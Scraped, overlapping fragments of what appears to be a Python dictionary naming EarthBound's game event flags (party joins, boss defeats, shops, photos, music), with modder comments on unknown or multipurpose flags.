(???)", "698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704:", "(I hate multipurpose flags) # 229 (I hate multipurpose flags) # 230 (I", "'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP',", "defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY',", "'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES',", "127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133:", "'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED',", "of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR',", "attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED',", "hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel", "'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT',", "155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE',", "'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 
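# (Re: flag 345 above) the "radius of 16 pixels" around (0x02A0, 0x0D70) is
# probably a box check rather than a true circle; a minimal sketch of the
# idea, with hypothetical x/y player-coordinate names not defined here:
#   near_lake_tess = abs(x - 0x02A0) <= 16 and abs(y - 0x0D70) <= 16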
539:", "'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING',", "182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188:", "(???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386:", "'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574:", "641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647:", "this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395:", "'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK',", "# 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376", "189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195:", "Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO:", "'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED',", "color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293:", "if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES',", "250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256:", "'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE',", "'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6', 835: 'PRESENT_TONY_COOKIE_7'", "moles defeated? How does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED',", "239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245:", "# 320 (???) 
# 321 (Something about Paula's Dad acknowledging the kidnapping) 322:", "'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you", "659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665:", "WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5',", "28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34:", "'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER',", "'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH',", "643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649:", "359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365:", "flags) # 230 (I hate multipurpose flags) # 231 (I hate multipurpose flags)", "'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343:", "464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's", "327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333:", "'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS',", "Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', #", "735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741:", "262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268:", "to Ness's house door knocking?) 
468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM',", "'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588", "'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER',", "44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50:", "'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622:", "'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED',", "# 313 (Unknown. Something about the City Bus?) # 314 (Unknown. Something about", "'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC',", "340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related", "fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397:", "368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371", "61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED',", "(I hate multipurpose flags) # 232 (I hate multipurpose flags) # 233 (I", "(Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save your game.", "# 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS',", "378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383:", "'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3',", "talking to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE',", "627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633:", "692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698:", "# 780 (If set, Maxwell doesn't actually save your game. WHAT?) 
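# The two photo runs appear to mirror each other: each PHOTO_*_AVAILABLE flag
# (479-510) has its matching GOT_PHOTO_* flag exactly 219 IDs later (698-729),
# e.g. 479 -> 698 and 510 -> 729. Handy as a sanity check when annotating
# either range.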
805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833:", "42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48:", "69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75:", "'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT',", "721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727:", "'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE',", "'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE',", "257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263:", "TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481:", "(Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', #", "609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and", "677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?)", "How does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT',", "Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY',", "524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529", "# 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 
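# The PRESENT_* flags presumably mark individual gift boxes as already opened,
# one flag per box (hence seven separate Tony cookies); the unnamed gap at
# 806-828 likely covers other boxes that simply have no name here yet.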
530:", "457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463:", "'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT',", "'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED',", "750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756:", "624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli Building) --", "defeated? How does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285:", "Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS',", "'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If", "'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?) #", "237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243:", "415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421:", "224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227 (I", "166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES',", "flags) # 227 (I hate multipurpose flags) # 228 (I hate multipurpose flags)", "595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN',", "'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?) 
# 680 (Something", "and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396:", "362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368:", "509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515:", "592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595:", "668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP',", "'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1',", "194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when", "'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 